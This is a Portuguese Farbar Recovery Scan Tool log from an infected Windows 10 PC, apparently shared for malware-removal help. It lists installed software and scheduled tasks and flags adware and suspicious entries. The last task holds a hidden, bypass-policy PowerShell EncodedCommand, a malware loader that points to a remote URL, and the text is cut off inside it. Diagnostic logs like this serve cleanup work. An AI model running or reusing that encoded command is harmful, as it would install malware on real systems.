Publicité
Publicité
Format du document : text/plain
Prévisualisation
Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão:10-01-2015 01
Executado por Marcio (2016-01-16 22:08:10)
Executando a partir de C:\Users\Marcio\Downloads
Windows 10 Pro (X64) (2015-11-08 13:42:07)
Modo da Inicialização: Normal
==========================================================
==================== Contas: =============================
Administrador (S-1-5-21-3906656628-415594203-1951508915-500 - Administrator - Disabled)
Convidado (S-1-5-21-3906656628-415594203-1951508915-501 - Limited - Disabled)
DefaultAccount (S-1-5-21-3906656628-415594203-1951508915-503 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3906656628-415594203-1951508915-1002 - Limited - Enabled)
Marcio (S-1-5-21-3906656628-415594203-1951508915-1001 - Administrator - Enabled) => C:\Users\Marcio
==================== Central de Segurança ========================
(Se uma entrada for incluída na fixlist, será removida.)
AV: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Programas Instalados ======================
(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)
"Just Cause 2" (HKLM-x32\...\{E2FC9928-87BE-4947-B68E-4A3414E33767}_is1) (Version: - )
µTorrent (HKU\S-1-5-21-3906656628-415594203-1951508915-1001\...\uTorrent) (Version: 3.4.2.39744 - BitTorrent Inc.)
3DP Chip v15.10 (HKLM-x32\...\3DP Chip) (Version: v15.10 - 3DP)
Adobe Photoshop CC (HKLM-x32\...\{2D99B50E-431D-4AA8-85C1-172A6F8BCF09}) (Version: 14.0 - Adobe Systems Incorporated)
Akamai NetSession Interface (HKU\S-1-5-21-3906656628-415594203-1951508915-1001\...\Akamai) (Version: - Akamai Technologies, Inc)
Assassin's Creed II (HKLM-x32\...\{8570BEE8-0CA3-4977-9AB1-80ED93F0513C}) (Version: 1.01 - Ubisoft)
ATK Package (HKLM-x32\...\{AB5C933E-5C7D-4D30-B314-9C83A49B94BE}) (Version: 1.0.0031 - ASUS)
aTube Catcher (HKLM-x32\...\aTube Catcher) (Version: 3.8.5187 - DsNET Corp)
aTube Catcher versão 3.8 (HKLM-x32\...\{D43B360E-722D-421B-BC77-20B9E0F8B6CD}_is1) (Version: 3.8 - DsNET Corp)
Bully. Scholarship Edition (HKLM-x32\...\Bully. Scholarship Edition_R.G. Mechanics_is1) (Version: - R.G. Mechanics, SeRaph1)
Cabal Nexus Games (HKLM-x32\...\{D8759F70-F3EF-47F3-AADB-3FE46EE508A6}_is1) (Version: 12.50 - Nexus Games, Inc.)
Call of Duty Modern Warfare 3 version 1.0 (HKLM-x32\...\{4B7IL77L-LKS1-75B1-CODMW3-18CD6E6334R1}_is1) (Version: 1.0 - Activision)
CCleaner (HKLM\...\CCleaner) (Version: 5.0 - Piriform)
Cheat Engine 6.1 (HKLM-x32\...\Cheat Engine 6.1_is1) (Version: - Dark Byte)
Corel Graphics - Windows Shell Extension (HKLM-x32\...\_{B865FDD4-E96E-4166-BB69-6E8C207E3E29}) (Version: 17.0.0.491 - Corel Corporation)
Corel Graphics - Windows Shell Extension (x32 Version: 17.0.491 - Corel Corporation) Hidden
Corel Graphics - Windows Shell Extension 64 Bit (Version: 17.0.491 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - BR (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Capture (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Common (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Connect (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Custom Data (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Draw (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Filters (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - FontNav (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - IPM Content (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - IPM T (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - PHOTO-PAINT (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Photozoom Plugin (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Redist (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Setup Files (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - VBA (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - VideoBrowser (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Writing Tools (x32 Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 (HKLM-x32\...\_{C5D9CECB-A66F-473F-B406-5C8C2DCA4DF0}) (Version: 17.0.0.491 - Corel Corporation)
CorelDRAW Graphics Suite X7 (x32 Version: 17.0 - Corel Corporation) Hidden
Counter-Strike 1.6 (HKLM-x32\...\Counter-Strike 1.6) (Version: - )
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.2.0.0114 - Disc Soft Ltd)
Deadpool (HKLM-x32\...\Deadpool_R.G. Mechanics_is1) (Version: - R.G. Mechanics, spider91)
Driver Magician 4.5 (HKLM-x32\...\Driver Magician_is1) (Version: - GoldSolution Software, Inc.)
ELAN Touchpad 15.9.6.1_X64_WHQL (HKLM\...\Elantech) (Version: 15.9.6.1 - ELAN Microelectronic Corp.)
Garena+ (HKLM-x32\...\im) (Version: 2011 - Garena Online Pte Ltd.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.111 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2993 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.9.4.1000 - Intel Corporation)
JMicron Ethernet Adapter NDIS Driver (HKLM-x32\...\{96DCEE2F-98EE-4F80-8C0F-7C04D1FB9D7F}) (Version: 6.0.23.4 - JMicron Technology Corp.)
JMicron Flash Media Controller Driver (HKLM-x32\...\{26604C7E-A313-4D12-867F-7C6E7820BE4C}) (Version: 1.0.67.0 - JMicron Technology Corp.)
Malwarebytes Anti-Malware versão 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2012 (HKLM-x32\...\{89ca2a32-2b52-4595-8dfd-6fe4757958d0}) (Version: 11.0.51108 - Microsoft Corporation)
Minimal ADB and Fastboot version 1.1.3 (HKLM-x32\...\{DE46417A-9E9E-4BCD-BBDD-DA21943193BB}_is1) (Version: 1.1.3 - )
Motorola Device Manager (HKLM-x32\...\{28DB8373-C1BB-444F-A427-A55585A12ED7}) (Version: 2.5.4 - Motorola Mobility)
Motorola Device Software Update (x32 Version: 13.09.3001 - Motorola Mobility) Hidden
Motorola Mobile Drivers Installation 6.4.0 (HKLM\...\{27986EDD-C9EC-4B52-B92F-06D073F0AA52}) (Version: 6.4.0 - Motorola Mobility LLC)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
Need for Speed™ Undercover (HKLM-x32\...\{E6D22FE1-AB5F-42CA-9480-6F70B96DDD88}) (Version: 1.0.1.0 - Electronic Arts)
NVIDIA PhysX (HKLM-x32\...\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}) (Version: 9.12.1031 - NVIDIA Corporation)
Pacote de Driver do Windows - Intel (HECIx64) System (09/17/2009 6.0.0.1179) (HKLM\...\30A4777E896192B8D398199AE1AB235B69BAB26D) (Version: 09/17/2009 6.0.0.1179 - Intel)
Pacote de Driver do Windows - Intel (Impcd) System (02/26/2010 01.02.00.1002) (HKLM\...\72A1288AD1FD92CA44C28F8A5B2B982B4569234E) (Version: 02/26/2010 01.02.00.1002 - Intel)
Pacote de Driver do Windows - Qualcomm Atheros Communications Inc. (athr) Net (08/14/2015 10.0.0.326) (HKLM\...\56B1A735BC0841E802E7BB371D433BD236941875) (Version: 08/14/2015 10.0.0.326 - Qualcomm Atheros Communications Inc.)
Pacote de Idiomas do Microsoft Visual Studio 2010 Tools for Office Runtime (x64) - Português (Brasil) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - PTB) (Version: 10.0.50903 - Microsoft Corporation)
Pacote de Idiomas do Microsoft Visual Studio Tools for Applications 2012 x64 Hosting Support - PTB (Version: 11.0.51108 - Microsoft Corporation) Hidden
Pacote de Idiomas do Microsoft Visual Studio Tools for Applications 2012 x86 Hosting Support - PTB (x32 Version: 11.0.51108 - Microsoft Corporation) Hidden
Payday The Heist (c) OVERKILL Software version 1 (HKLM-x32\...\Payday The Heist (c) OVERKILL Software_is1) (Version: 1 - )
PDF Settings CC (x32 Version: 12.0 - Adobe Systems Incorporated) Hidden
PointBlank (HKU\S-1-5-21-3906656628-415594203-1951508915-1001\...\PointBlank) (Version: 2.1.0 - Ongame S.A & Zepetto)
PriceFountain (remove only) (HKU\.DEFAULT\...\PriceFountain) (Version: 1.2.7.9 - KWPWIRQLZCT) <==== ATENÇÃO
PS TO PC CONVERTER (HKLM-x32\...\{A483F88A-41E9-45B2-AAC9-A823DD9B4873}) (Version: 2006.5.26 - )
Razer Cortex (HKLM-x32\...\Razer Cortex_is1) (Version: 6.3.19.0 - Razer Inc.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.34.1130.2010 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7571 - Realtek Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.51 - Piriform)
Resident Evil 4 1.10 (HKLM-x32\...\Resident Evil 4_is1) (Version: - )
Rocket League Chaos Run (HKLM-x32\...\Rocket League Chaos Run_is1) (Version: - )
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
Sniper Elite (HKLM-x32\...\Sniper Elite_R.G. Mechanics_is1) (Version: - R.G. Mechanics, spider91)
Software de dispositivo do Chipset Intel® (x32 Version: 10.0.13 - Intel(R) Corporation) Hidden
SPORE™ (HKLM-x32\...\{9DF0196F-B6B8-4C3A-8790-DE42AA530101}) (Version: 1.00.0000 - Electronic Arts)
Spotify (HKU\S-1-5-21-3906656628-415594203-1951508915-1001\...\Spotify) (Version: 1.0.19.106.gb8a7150f - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
True Crime® New York City (HKLM-x32\...\{C920EFB6-59DB-472D-B445-21821477AD17}) (Version: 1.00.0000 - Aspyr Media, Inc.)
Ubisoft Game Launcher (HKLM-x32\...\{888F1505-C2B3-4FDE-835D-36353EBD4754}) (Version: 1.0.0.0 - UBISOFT)
Update for PriceFountain (HKU\.DEFAULT\...\Price Fountain) (Version: - Update for PriceFountain) <==== ATENÇÃO
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 2.30.3 - ASUS)
WinRAR 5.01 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
Языковой пакет для поддержки размещения набора средств Microsoft Visual Studio Tools для работы с приложениями 2012 (x64) - RUS (Version: 11.0.51108 - Microsoft Corporation) Hidden
Языковой пакет для поддержки размещения набора средств Microsoft Visual Studio Tools для работы с приложениями 2012 (x86) - RUS (x32 Version: 11.0.51108 - Microsoft Corporation) Hidden
==================== Exame Personalizado CLSID (Whitelisted): ==========================
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
CustomCLSID: HKU\S-1-5-21-3906656628-415594203-1951508915-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Marcio\AppData\Local\Microsoft\OneDrive\17.3.6281.1202\FileCoAuth.exe (Microsoft Corporation)
==================== Tarefas Agendadas (Whitelisted) =============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
Task: {061FEADF-9758-47D1-AF49-26E548CD1C26} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {0D2E1CD1-35CC-455D-B06C-F4835DD49C3A} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {14E98FB6-2CE9-4E8B-9FB3-A044080E2CE7} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {20453C22-D886-47E7-8173-C05CD592B5EF} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {23F1ACAA-DA8C-41F4-B2BE-7803DF9E9D09} - System32\Tasks\{E1F7F0A5-253E-4658-BFB9-19DD8DE6B4EA} => pcalua.exe -a C:\Users\Marcio\AppData\Local\Temp\uninstallmodule.exe -d C:\Users\Marcio\AppData\Local\Temp
Task: {2685596C-4224-41C6-93A4-2480FB89B059} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-18] (Google Inc.)
Task: {291B9C61-B0C7-4F0B-94AA-DE1984141E6A} - System32\Tasks\RtHDVBg_ListenToDevice => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2016-01-08] (Realtek Semiconductor)
Task: {33DC02B3-1BB4-4DF0-AF2F-0C54F56CB2DC} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {3C240A37-FCCC-4C62-AAFC-D02AE2D87134} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2016-01-08] (Realtek Semiconductor)
Task: {452E843E-8D47-4E36-8D6F-3CF6AD341FF5} - \crash_service -> Nenhum Arquivo <==== ATENÇÃO
Task: {469FB128-50BD-478E-B4DC-D9D04C710FA0} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Nenhum Arquivo <==== ATENÇÃO
Task: {4CF2BC1A-F781-4B92-92E0-BF2D7195F5CE} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {4D90F36B-0221-4A27-B94F-F1E7E8FF049B} - System32\Tasks\{2A6A6C0A-6DF1-4478-807F-2FF9BF46B935} => C:\Users\Marcio\AppData\Roaming\{2F3AA0F6-976C-4b02-A66A-5D1DEA00811F}\InstallHelp.exe [2015-05-15] () <==== ATENÇÃO
Task: {4DEC28DF-7AC9-4DA2-8B27-F3EE658A4A9C} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {57BEC164-C526-43D3-A481-FCC6CCAE60DC} - System32\Tasks\Uumdigeu => C:\ProgramData\Uumdigeu\1.0.7.1\ksupsuus.exe
Task: {58422721-F7B0-45E6-B485-0C32FF1A7710} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {5B07D843-6AC5-4118-9779-A5B84A9EBD80} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {5D31DB1F-EE88-4C70-84B1-23013F926F1B} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {62FDEBF5-57F6-4889-818D-1DEC5D247EBE} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-11-13] (Piriform Ltd)
Task: {7192C381-D3AD-4224-A6D0-B7BF1F8C1DA7} - System32\Tasks\{1B094A35-6227-41B1-BC90-24BA5499CA4A} => pcalua.exe -a "C:\Program Files (x86)\MPC Cleaner\Uninstall.exe"
Task: {79FE3EB8-F71A-4D6A-9EDB-38E8580827BF} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {7A07AA65-105B-43DA-8546-54B85D52DD57} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {7C1D662B-E224-4E1C-8FF1-0F8864513362} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {7E9F0B9E-30E2-4234-B47C-0F6EDE528703} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {7FCA28E4-30E7-40E3-B0D9-AABCDC9B1A28} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {82114C91-2CC6-4F93-A0B1-755B71990B59} - System32\Tasks\svchost => C:\Users\Marcio\AppData\Local\Temp\R8WB8RF3U.exe <==== ATENÇÃO
Task: {82A9008C-61FF-44C6-87E8-29D917C62070} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {89396946-4560-4928-8C3D-ADEB45DB5D87} - \Run_Bobby_Browser -> Nenhum Arquivo <==== ATENÇÃO
Task: {8D9B55C3-950F-4970-89D7-E106867B5275} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-01-13] (Microsoft Corporation)
Task: {8EC4902F-DCF2-4D18-A5A1-FC8442EADC79} - System32\Tasks\{8C3535FB-30E3-431E-98FE-3C5970869DB6} => pcalua.exe -a D:\VL813.exe
Task: {92E29EC9-DDAE-468F-B413-2D35D75ECDD4} - System32\Tasks\{65A4EB63-286F-4195-8F92-FBFB1F7C021E} => pcalua.exe -a "C:\Program Files (x86)\ttwifi\unins000.exe"
Task: {9A7623E2-DD4F-435B-BE53-73D3B2E2245F} - System32\Tasks\{0E3CF564-B6FA-49DD-8E55-0ADBDC94A107} => pcalua.exe -a "C:\Program Files (x86)\WeatherTool\2.0.0.11150\InstallHelper.exe" -c -Uninstall English
Task: {9F957308-9DEA-4670-B71E-1B5999A14DD7} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {A373B047-44EC-4E1F-B472-8DEEA060717D} - System32\Tasks\{C79FF0C8-9AE3-4E40-BB5B-A908DBD75074} => pcalua.exe -a C:\Users\Marcio\Downloads\gfwlivesetup.exe -d C:\Users\Marcio\Downloads
Task: {A564D676-7F6B-46AE-992D-83F35486E2D6} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {A5D52503-DE44-4447-A2D0-FC18555A9C57} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Nenhum Arquivo <==== ATENÇÃO
Task: {A6A24E59-BB4E-4D07-859A-D770F2B97F64} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Nenhum Arquivo <==== ATENÇÃO
Task: {A799C960-9E1B-4D3D-AE39-6F307A14E905} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {B218A4D5-0C9A-49DF-9254-2E8BF77B9A05} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {B954AB9F-9ED3-41C9-B8A1-C028021ACAB5} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Nenhum Arquivo <==== ATENÇÃO
Task: {BB8014C9-8185-412B-937B-5202F77092C9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-18] (Google Inc.)
Task: {BCF4F39A-0CC7-4909-8C6D-8744E56721A7} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {BDE784C1-C6ED-4B8F-8233-6BF61EB8BE3A} - System32\Tasks\{08660FA5-E614-4722-83B3-6723975F8DE1} => pcalua.exe -a "C:\Users\Marcio\Desktop\Nova pasta\Tradução.exe" -d "C:\Users\Marcio\Desktop\Nova pasta"
Task: {BE26A94B-1105-41B6-8C5C-86873F2D6497} - System32\Tasks\ATKOSD2 => C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe [2013-09-09] (ASUSTek Computer Inc.)
Task: {BFA75651-A6A6-4502-A153-33E80DFCEF05} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Nenhum Arquivo <==== ATENÇÃO
Task: {BFDB5F72-05EA-4B18-9859-E2648FCE624A} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {C36A41C1-BF65-4E22-962D-3990CEFE777E} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {D5102D8D-F343-4064-9810-4C5B24113547} - System32\Tasks\Garena+ Plugin Host Service => C:\Program Files (x86)\Garena Plus\ggdllhost.exe [2015-12-08] ()
Task: {DBBEE747-2037-4CBE-A07D-167F85B847F0} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {DFBD71E3-BF72-4896-B63C-4F439B9D9DE2} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {E14122B9-5332-43C5-AC05-0EE645637440} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {E81F727A-AEB2-471E-AA14-7CFDCE77CCA4} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Nenhum Arquivo <==== ATENÇÃO
Task: {E98587F0-7FC2-42F6-87B7-F1AA099A6FBD} - System32\Tasks\{0A0D0847-0D0C-040D-0D11-7E050504117E} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGUAYQBzAHkAcABvAHAALgBpAG4AZgBvAC8AdQAvAD8AYQA9AGIAagA1AG8ARwBxAFMAYwBFAF8ARQBfAGYAdABIAHUAZQBjAGYAXwA1AHAAWQBEADgANgB5AFcAZwBxAEgAaAB5AGIAZgBnADQAWAAtAFoAaQA4AGoAVQB4AGgAbwA3ADIARAA5AHAALQBWAGoAdABSAFEANwBPAGIAdQA4AEYAQgBFAG0ARQBkAFUAWQB3AFcAWABIADEAcQBzAEgAcgBtAGkANwBvAGYAdABjAEwAeAAwADIANABYAHAARQBqADcAcwBYAFoAbABpAFkALQBHAG8AWgByAFkAUgAzAFcAaQA0AEQAOQBJAHgAcgBxADEARwB6AE0AQgBsAHcAUwBBAGYAWABCAFIANQ